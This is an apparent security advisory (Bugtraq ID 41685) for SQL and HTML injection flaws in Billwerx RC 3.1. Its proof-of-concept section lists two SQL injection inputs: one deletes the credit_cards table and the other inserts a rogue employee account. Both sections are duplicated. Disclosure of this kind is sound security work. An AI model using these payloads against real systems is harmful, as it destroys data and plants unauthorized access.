Billwerx SQL Injection and HTML Injection Vulnerabilities
BID:41685
Info
Billwerx SQL Injection and HTML Injection Vulnerabilities
| Bugtraq ID: | 41685 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 13 2009 12:00AM |
| Updated: | Dec 13 2009 12:00AM |
| Credit: | mr_me |
| Vulnerable: |
billwerx Billwerx RC 3.1 |
| Not Vulnerable: | |
Exploit / POC
Billwerx SQL Injection and HTML Injection Vulnerabilities
An attacker can exploit these issues through a browser.
The following example inputs are available:
SQL injection:
1. ','1'); DELETE FROM credit_cards;/*
2. ','1'); insert into employees values (4, 'mr_me', 'hello', '', '', '', '', '', '[email protected]', 'lol_mypassword', 0.00, 3, '', '', '', '', '', '2009-07-28 10:47:59');/*
An attacker can exploit these issues through a browser.
The following example inputs are available:
SQL injection:
1. ','1'); DELETE FROM credit_cards;/*
2. ','1'); insert into employees values (4, 'mr_me', 'hello', '', '', '', '', '', '[email protected]', 'lol_mypassword', 0.00, 3, '', '', '', '', '', '2009-07-28 10:47:59');/*
Solution / Fix
Billwerx SQL Injection and HTML Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]